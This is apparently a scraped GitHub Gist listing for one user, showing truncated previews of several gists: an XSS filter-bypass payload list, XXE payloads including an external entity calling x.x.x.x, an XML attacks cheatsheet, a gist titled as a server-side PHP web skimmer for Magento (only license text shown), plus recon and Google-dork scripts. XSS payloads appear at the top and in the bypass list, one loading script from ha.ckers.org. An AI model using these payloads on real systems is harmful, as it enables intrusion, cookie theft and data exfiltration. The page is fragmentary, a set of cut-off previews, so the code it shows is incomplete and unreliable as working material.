<script>
x = '<!--<script>'/*</script>-->*/;alert(1)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * Magento | |
| * | |
| * NOTICE OF LICENSE | |
| * | |
| * This source file is subject to the Academic Free License (AFL 3.0) | |
| * that is bundled with this package in the file LICENSE_AFL.txt. | |
| * It is also available through the world-wide-web at this URL: | |
| * http://opensource.org/licenses/afl-3.0.php | |
| * If you did not receive a copy of the license and are unable to |
pikpikcu
/ autoload.php
Last active
February 1, 2020 09:48
Server-side PHP web skimmer in lib/Varien/Autoload.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| The MIT License | |
| Copyright (c) 2010-2018 Google, Inc. | |
| Permission is hereby granted, free of charge, to any person obtaining a copy | |
| of this software and associated documentation files (the "Software"), to deal | |
| in the Software without restriction, including without limitation the rights | |
| to use, copy, modify, merge, publish, distribute, sublicense, and/or sell |
pikpikcu
/ XXE_payloads
Created
February 12, 2020 05:16
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
pikpikcu
/ xml-attacks.md
Created
February 12, 2020 05:17
— forked from mgeeky/xml-attacks.md
XML Vulnerabilities and Attacks cheatsheet
XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.
The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.
pikpikcu
/ xxsfilterbypass.lst
Last active
July 26, 2020 12:03
— forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ';alert(String.fromCharCode(88,83,83,32,98,121,32,112,105,107,112,105,107,99,117,32))//';alert(String.fromCharCode(88,83,83,32,98,121,32,112,105,107,112,105,107,99,117,32)) | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> | |
| <IMG SRC=JaVaScRiPt:alert('XSS')> |
pikpikcu
/ cloudflare_dyn_dns.sh
Created
February 15, 2020 08:24
— forked from chappy84/cloudflare_dyn_dns.sh
CloudFlare Dynamic DNS Shell Script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # | |
| # CloudFlare Dynamic DNS | |
| # | |
| # Updates CloudFlare records with the current public IP address | |
| # | |
| # Takes the same basic arguments as A/CNAME updates in the CloudFlare v4 API | |
| # https://www.cloudflare.com/docs/client-api.html#s5.2 | |
| # | |
| # Use with cron jobs etc. |
pikpikcu
/ st8out.sh
Created
February 20, 2020 23:35
— forked from dwisiswant0/st8out.sh
St8out - Extra one-liner for reconnaissance
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ##### | |
| # | |
| # St8out - Extra one-liner for reconnaissance | |
| # | |
| # Usage: ./st8out.sh target.com | |
| # | |
| # Resources: | |
| # - https://github.com/j3ssie/metabigor |
#!/bin/bash
# colors
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[0;33m'
RESET='\033[0m'
# install homebrew
pikpikcu
/ google-dorks
Created
February 24, 2020 17:14
— forked from clarketm/google-dorks
Listing of a number of useful Google dorks.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " _ _ " | |
| " _ /|| . . ||\ _ " | |
| " ( } \||D ' ' ' C||/ { % " | |
| " | /\__,=_[_] ' . . ' [_]_=,__/\ |" | |
| " |_\_ |----| |----| _/_|" | |
| " | |/ | | | | \| |" | |
| " | /_ | | | | _\ |" | |
| It is all fun and games until someone gets hacked! |